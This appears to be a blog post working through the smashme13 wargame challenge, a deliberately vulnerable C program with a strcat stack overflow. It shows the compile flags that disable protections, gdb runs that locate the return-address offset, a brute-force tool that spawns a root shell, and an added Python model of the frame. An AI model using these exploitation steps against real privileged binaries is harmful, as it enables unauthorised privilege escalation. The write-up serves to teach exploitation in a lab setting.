break a time, with break the c0de…

easy pwn on smashme13


Here are my tools in action…
The challenge is to smash this program with ASLR
and gain root access…

You can find the original source here: http://www.shell-storm.org/smashme/files/smashme-13.php

/* Compiled on x86 64 bits*/

#include <stdio.h>
#include <stdlib.h>   /* for exit(); the original omits it, which is what the gcc implicit-declaration warning below is about */
#include <string.h>

int smash(char*);

int main(int argc, char** argv)
{
    if (argc < 2) {
        fprintf(stderr, "usage: smashme <string>\n");
        exit(1);
    }
    smash(argv[1]);
    return 0;
}

int smash(char* egg)
{
    char buff[128];
    /* buff is never initialised and the length of egg is never checked:
       strcat() appends egg (plus its terminating NUL) after whatever NUL it
       finds in buff, so an argument of 128 bytes or more runs past the end
       of buff into the saved frame pointer and the return address. */
    strcat(buff, egg);
    return 0;
}

Action…

gunslinger@c0debreaker:~/bof$ vim smashme13.c
gunslinger@c0debreaker:~/bof$ gcc -o smashme13 -fno-stack-protector -mpreferred-stack-boundary=2 -g smashme13.c
smashme13.c: In function ‘main’:
smashme13.c:12: warning: incompatible implicit declaration of built-in function ‘exit’
gunslinger@c0debreaker:~/bof$
gunslinger@c0debreaker:~/bof$ ./bufferbruteforce.py -a /home/gunslinger/bof/smashme13 -s 1 -e 600

Buffer brute force
Programmer : gunslinger_ <yudha.gunslinger@gmail.com>

[*] Checking Existing application 					[Ok]
[*] Checking perl 							[Ok]
[*] Preparing for bruteforcing buffer 					[Ok]
[*] buffering on 128 byte(s)
[!] Application got segmentation fault by giving 128 byte(s) into buffer !!

gunslinger@c0debreaker:~/bof$ ./stackbf2 smashme13 132
[*] Using return address 0xbf8f9fe4 
[*] Environment variable 128 kb
[*] Shellcode size 57 bytes
^C
gunslinger@c0debreaker:~/bof$ ./smashme13 
usage: smashme <string>
gunslinger@c0debreaker:~/bof$ ./smashme13 a
gunslinger@c0debreaker:~/bof$ ./smashme13 `perl -e 'print "A" x 128'`
Segmentation fault
gunslinger@c0debreaker:~/bof$ gdb smashme13
GNU gdb 6.8-debian
Copyright (C) 2008 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i486-linux-gnu"...
(gdb) r `perl -e 'print "A" x 132'`
Starting program: /home/gunslinger/bof/smashme13 `perl -e 'print "A" x 132'`

Program received signal SIGSEGV, Segmentation fault.
0x08048408 in __do_global_dtors_aux ()
Current language:  auto; currently asm
(gdb) r `perl -e 'print "A" x 128'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/gunslinger/bof/smashme13 `perl -e 'print "A" x 128'`

Program received signal SIGSEGV, Segmentation fault.
0xbfe138a4 in ?? ()
(gdb) r `perl -e 'print "A" x 150'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/gunslinger/bof/smashme13 `perl -e 'print "A" x 150'`

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) r `perl -e 'print "A" x 148'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/gunslinger/bof/smashme13 `perl -e 'print "A" x 148'`

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) r `perl -e 'print "A" x 144'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/gunslinger/bof/smashme13 `perl -e 'print "A" x 144'`

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) r `perl -e 'print "A" x 142'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/gunslinger/bof/smashme13 `perl -e 'print "A" x 142'`

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) r `perl -e 'print "A" x 140'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/gunslinger/bof/smashme13 `perl -e 'print "A" x 140'`

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) r `perl -e 'print "A" x 120'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/gunslinger/bof/smashme13 `perl -e 'print "A" x 120'`

Program exited normally.
(gdb) r `perl -e 'print "A" x 135'`
Starting program: /home/gunslinger/bof/smashme13 `perl -e 'print "A" x 135'`

Program received signal SIGSEGV, Segmentation fault.
0x00414141 in ?? ()
(gdb) r `perl -e 'print "A" x 136'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/gunslinger/bof/smashme13 `perl -e 'print "A" x 136'`

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) disas main
Dump of assembler code for function main:
0x08048454 <main+0>:	push   %ebp
0x08048455 <main+1>:	mov    %esp,%ebp
0x08048457 <main+3>:	sub    $0x10,%esp
0x0804845a <main+6>:	cmpl   $0x1,0x8(%ebp)
0x0804845e <main+10>:	jg     0x8048491 <main+61>
0x08048460 <main+12>:	mov    0x804a01c,%eax
0x08048465 <main+17>:	mov    %eax,0xc(%esp)
0x08048469 <main+21>:	movl   $0x18,0x8(%esp)
0x08048471 <main+29>:	movl   $0x1,0x4(%esp)
0x08048479 <main+37>:	movl   $0x8048590,(%esp)
0x08048480 <main+44>:	call   0x8048368 <fwrite@plt>
0x08048485 <main+49>:	movl   $0x1,(%esp)
0x0804848c <main+56>:	call   0x8048388 <exit@plt>
0x08048491 <main+61>:	mov    0xc(%ebp),%eax
0x08048494 <main+64>:	add    $0x4,%eax
0x08048497 <main+67>:	mov    (%eax),%eax
0x08048499 <main+69>:	mov    %eax,(%esp)
0x0804849c <main+72>:	call   0x80484a8 <smash>
0x080484a1 <main+77>:	mov    $0x0,%eax
0x080484a6 <main+82>:	leave  
0x080484a7 <main+83>:	ret    
End of assembler dump.
(gdb) q
The program is running.  Exit anyway? (y or n) y
gunslinger@c0debreaker:~/bof$ ./stackbf2 smashme13 136
[*] Using return address 0xbfab19a4 
[*] Environment variable 128 kb
[*] Shellcode size 57 bytes
# id
uid=1000(gunslinger) gid=1000(gunslinger) euid=0(root) groups=4(adm),20(dialout),24(cdrom),46(plugdev),106(lpadmin),121(admin),122(sambashare),1000(gunslinger)
# whoami
root
# uname -a
Linux localhost 2.6.28-11-generic #42-Ubuntu SMP Fri Apr 17 01:57:59 UTC 2009 i686 GNU/Linux
# exit
gunslinger@c0debreaker:~/bof$
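As an added illustration (my own model, not the author's tool or code from the post) of why the gdb runs above fault where they do: it lays out smash()'s frame as buff[128] followed directly by the saved EBP and the return address into main (0x080484a1, the instruction after "call <smash>" in the disassembly), with no padding because of -mpreferred-stack-boundary=2, and applies strcat's copy including the terminating NUL. The saved EBP value is a constructed sample, and buff is assumed to start with a NUL byte, as the recorded crash lengths imply.

```python
import struct

BUF_SIZE = 128            # char buff[128] in smash()
EBP_OFF = BUF_SIZE        # saved EBP directly follows buff: -mpreferred-stack-boundary=2 adds no padding
RET_OFF = BUF_SIZE + 4    # return address into main() follows the saved EBP
FRAME_SIZE = RET_OFF + 4

# Return address pushed by "call <smash>": the next instruction, main+77 (from "disas main").
RET_ADDR = 0x080484A1
# Constructed sample value for main()'s frame pointer; the post does not show it.
SAVED_EBP = 0xBFE138C0


def frame_after_strcat(payload: bytes, saved_ebp: int = SAVED_EBP, ret_addr: int = RET_ADDR):
    """Return (saved_ebp, return_address) left in smash()'s frame after strcat(buff, egg).

    Assumes buff[0] == 0 on entry (otherwise strcat would start past the garbage).
    strcat copies the terminating NUL as well, so an n-byte argument writes n + 1 bytes.
    """
    frame = bytearray(BUF_SIZE) + struct.pack("<II", saved_ebp, ret_addr)
    data = payload + b"\x00"
    n = min(len(data), FRAME_SIZE)   # bytes past the frame land in main()'s frame; not modelled
    frame[:n] = data[:n]
    return struct.unpack_from("<II", frame, EBP_OFF)


def describe(payload: bytes) -> str:
    """Explain what smash()'s leave/ret will do with the corrupted frame."""
    ebp, ret = frame_after_strcat(payload)
    if ret != RET_ADDR:
        return "ret overwritten: eip becomes 0x%08x" % ret
    if ebp != SAVED_EBP:
        return "ret intact, saved ebp is 0x%08x: main()'s own leave/ret derails" % ebp
    return "frame intact"


def eip_offset(fill: int = 0x41) -> int:
    """Smallest argument length whose bytes fully replace the return address (the gdb bisection above)."""
    target = int.from_bytes(bytes([fill]) * 4, "little")
    for n in range(FRAME_SIZE + 1):
        if frame_after_strcat(bytes([fill]) * n)[1] == target:
            return n
    raise ValueError("return address not reachable")


if __name__ == "__main__":
    for n in (120, 128, 132, 135, 136):
        print("%3d bytes: %s" % (n, describe(b"A" * n)))
    print("offset to eip:", eip_offset())
```

The 132-byte case gives eip 0x08048400: only the low byte of the return address is zeroed by the NUL, which is why that run died inside __do_global_dtors_aux just below main rather than at 0x41414141.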

7 responses

  1. wisdom

    Keep it up bro, I've got your back

    July 28, 2010 at 10:25 am

  2. Cyb3erFred0M

    Uncle Gun… why is it that while the buffer process is running it doesn't stop at 404 bytes, it's still running past 20000, why is that… and what is this actually for, bro Gun

    July 31, 2010 at 11:09 am

    • maybe the application path is wrong, bro, or when you compiled it you didn't use
      -fno-stack-protector -mpreferred-stack-boundary=2
      those two options are there so the application isn't protected by the stack protector and is injectable

      August 1, 2010 at 6:42 am

  3. elite

    Try not to compile with -mpreferred-stack-boundary=2 to learn how to bypass ASLR and -fno-stack-protector to learn how to bypass compiler level protector.

    August 1, 2010 at 12:11 pm

    • it's impossible because by default the application is using the stack protector on current compilers now… not like the old days' compilers…

      August 2, 2010 at 5:18 am

  4. Cyb3erFred0M

    you compiled it with those options, bro Gun……….hehehehe but it did work, bro………….keep it up bro Gun

    August 1, 2010 at 9:44 pm

  5. nice script bro … :D

    August 24, 2010 at 5:21 pm
